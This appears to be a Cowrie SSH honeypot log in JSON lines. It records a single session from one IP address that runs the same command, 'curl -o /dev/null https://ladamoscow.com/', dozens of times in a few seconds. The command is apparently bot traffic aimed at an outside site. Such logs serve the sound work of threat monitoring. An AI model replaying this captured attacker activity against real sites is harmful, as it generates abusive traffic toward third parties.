{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.285968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.323648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.324685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.361319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.362324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.411596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.412734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.449727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.450934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.488720Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.489781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.527231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.528407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.565675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.566921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.603956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.605026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.643099Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.644199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.681272Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.682379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.720469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.721546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.758651Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.759894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.815092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.816287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.854355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.855548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.892843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.894202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.931974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.933234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.971845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.972904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.010105Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.011274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.062290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.063354Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.100486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.101554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.141913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.143020Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.181305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.182496Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.250310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.251643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.292939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.294355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.332146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.333192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.374444Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.375414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.430188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.431169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.517068Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.518042Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":30.458800315856934,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.528546Z","src_ip":"221.153.192.22","session":"7e7750f97e90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.554895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.556014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.594387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.595453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.631990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.633317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.670525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.671797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.718564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.719807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.818280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.819725Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.858523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.859617Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.896984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.897965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.934595Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.935871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:20.972640Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:20.973709Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.012071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.013362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.050573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.052021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.089224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.090310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.127513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.128630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.176655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.177980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.226171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.227290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.263954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.265006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.302299Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.303630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.340234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.341260Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.378331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.379408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.418454Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.419869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.458861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.459958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.497262Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.498302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.536006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.537304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.589051Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.590083Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.626999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.628055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.666209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.667544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.704319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.705314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.741980Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.743072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.779857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.780875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.817988Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.819059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.855665Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.856739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.901431Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.902511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:21.941663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:21.942816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.015310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.016427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.347914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:22.349300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:22.392474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
